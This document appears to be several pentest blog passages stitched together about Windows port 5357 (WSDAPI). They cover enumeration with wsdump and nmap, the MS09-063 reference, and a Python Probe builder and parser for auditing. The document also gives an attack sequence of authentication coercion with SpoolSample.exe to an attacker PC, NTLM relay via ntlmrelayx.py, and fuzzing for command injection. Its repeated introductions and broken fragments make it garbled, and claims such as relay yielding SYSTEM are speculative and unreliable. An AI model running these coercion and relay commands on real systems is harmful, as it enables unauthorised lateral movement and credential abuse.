Port 5357 is officially allocated to WSDAPI – Web Services for Devices on Windows. It is part of Microsoft’s implementation of the Devices Profile for Web Services (DPWS). Think of it as a "Plug and Play for the network" – devices (printers, scanners, media servers, IoT hubs) announce themselves and their capabilities via SOAP/HTTP.
By default, Windows 10/11 and Server 2016/2019/2022 listen on 0.0.0.0:5357 when network discovery is enabled (turned on in "Network and Sharing Center").
git clone https://github.com/ianling/wsdpy
cd wsdpy
python3 wsdump.py 10.10.10.5
This sends a Probe message and lists all advertised devices, their types, scopes, and metadata addresses.
Example output:
Device: http://10.10.10.5:5357/wsd/3f8c2a1b-...
Type: Printer
Friendly Name: HP LaserJet M402dw
Metadata URL: http://10.10.10.5:5357/wsd/3f8c2a1b/metadata
Many devices (and even Windows hosts with sharing enabled) expose metadata without authentication.
⚠️ Always have proper authorization before scanning or testing port 5357 on any system.
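The Probe and ProbeMatches exchange described above, as an added example (not code from wsdpy or from the original page): it builds the Probe envelope and parses a reply into the endpoint, types, scopes and transport addresses a host advertises, which is what you audit when deciding whether network discovery should stay enabled. The function names and the sample reply are constructed for illustration; the namespaces are those of the WS-Discovery 2005/04 draft.

```python
import uuid
import xml.etree.ElementTree as ET

# Namespaces of the WS-Discovery 2005/04 draft that WSDAPI speaks.
NS = {
    "s": "http://www.w3.org/2003/05/soap-envelope",
    "a": "http://schemas.xmlsoap.org/ws/2004/08/addressing",
    "d": "http://schemas.xmlsoap.org/ws/2005/04/discovery",
}
XMLNS = " ".join(f'xmlns:{p}="{u}"' for p, u in NS.items())

def build_probe(message_id=None):
    """Return (message_id, xml) for a Probe with no Types/Scopes filter."""
    message_id = message_id or f"urn:uuid:{uuid.uuid4()}"
    return message_id, (
        f"<s:Envelope {XMLNS}><s:Header>"
        f"<a:Action>{NS['d']}/Probe</a:Action>"
        f"<a:MessageID>{message_id}</a:MessageID>"
        "<a:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</a:To>"
        "</s:Header><s:Body><d:Probe/></s:Body></s:Envelope>")

def parse_probe_matches(xml_text, probe_id):
    """List what each ProbeMatch advertises; ignore replies to other probes."""
    if "<!DOCTYPE" in xml_text:  # untrusted input: refuse DTDs/entity tricks
        raise ValueError("DTD not allowed in a WS-Discovery reply")
    root = ET.fromstring(xml_text)
    if root.findtext("s:Header/a:RelatesTo", "", NS).strip() != probe_id:
        return []
    return [{
        "endpoint": m.findtext("a:EndpointReference/a:Address", "", NS).strip(),
        "types": m.findtext("d:Types", "", NS).split(),
        "scopes": m.findtext("d:Scopes", "", NS).split(),
        "xaddrs": m.findtext("d:XAddrs", "", NS).split(),
    } for m in root.iterfind("s:Body/d:ProbeMatches/d:ProbeMatch", NS)]

# Constructed sample reply (UUIDs are made up; the address is the page's 10.10.10.5).
PROBE_ID = "urn:uuid:11111111-1111-4111-8111-111111111111"
SAMPLE_REPLY = f"""<s:Envelope {XMLNS}>
<s:Header><a:RelatesTo>{PROBE_ID}</a:RelatesTo></s:Header>
<s:Body><d:ProbeMatches><d:ProbeMatch>
<a:EndpointReference><a:Address>urn:uuid:00000000-0000-4000-8000-000000000001</a:Address></a:EndpointReference>
<d:Types>wsdp:Device</d:Types>
<d:XAddrs>http://10.10.10.5:5357/00000000-0000-4000-8000-000000000001/</d:XAddrs>
</d:ProbeMatch></d:ProbeMatches></s:Body></s:Envelope>"""

if __name__ == "__main__":
    for dev in parse_probe_matches(SAMPLE_REPLY, PROBE_ID):
        print(dev["endpoint"], dev["types"], dev["xaddrs"])
```

Any `xaddrs` entry on port 5357 is a metadata endpoint the host hands to every client on the segment, so it is the list to review against your network discovery policy.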
Port 5357 is a common sight during Windows penetration tests, often identified as Microsoft HTTPAPI httpd 2.0 or WSDAPI (Web Services for Devices API). While often overlooked, it serves as a critical discovery point for local network reconnaissance and legacy exploitation.
Service Overview
WSDAPI is Microsoft's implementation of the WS-Discovery protocol. It allows Windows machines to automatically discover and communicate with network-connected devices like printers, scanners, and file shares without manual configuration.
Port 5357 (TCP): Used for HTTP-based communication.
Port 5358 (TCP): Used for HTTPS-based communication.
Port 3702 (UDP): Used for multicast discovery.
Reconnaissance & Enumeration
When you encounter port 5357, the first step is to confirm the service and identify potential information leaks.
1. Nmap Service Detection
A standard version scan will often reveal the underlying HTTP server.
nmap -sV -p 5357 <target>
Expected Output:
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
2. Information Disclosure
Port 5357 can leak metadata useful for fingerprinting the target.
Hostnames & Device Names: WSD often broadcasts the actual name of the computer or printer. WSD/HTTP requests
OS Fingerprinting: The specific response from Microsoft-HTTPAPI/2.0 can help narrow down Windows versions (commonly seen in Vista, Windows 7, and Server 2008).
Vulnerabilities & Exploitation
1. Remote Code Execution (MS09-063 / CVE-2009-2512)
This is the most critical historic vulnerability associated with port 5357.
Reference: Microsoft Security Bulletin MS09-063 - Critical
In the world of internal network penetration testing, most hackers focus on the "big three": SMB (445), RDP (3389), and WinRM (5985/5986). However, subtle infiltration vectors often hide on less common ports. One such port is TCP 5357.
If you run nmap -p5357 192.168.1.0/24 and see the port open, you might have stumbled upon a Windows service that is poorly understood but potentially dangerous: WSDAPI (Web Services for Devices on Windows).
This article acts as a HackTricks-style guide to port 5357: what it is, how to enumerate it, misconfigurations, vulnerabilities, and how to abuse it for lateral movement.
You have a foothold on WORKSTATION-A (192.168.1.10). Scanning finds 192.168.1.50:5357 open.
Unauthenticated API abuse
Step 1: Coerce Authentication
Using SpoolSample.exe:
SpoolSample.exe TARGET-50 AttackerPC
This forces TARGET-50 (WSD-enabled printer server) to authenticate to your machine on SMB.
Step 2: Relay to WSD
ntlmrelayx.py -t http://192.168.1.50:5357/wsd/endpoint -wh 192.168.1.100 -smb2support
If successful, you might get device control or even SYSTEM.
Step 3: Command Injection via WSD Action
Some WSD implementations accept a Set action. Fuzzing the metadata might reveal an action like SetSystemTime or ExecuteCommand (rare but happens in embedded devices).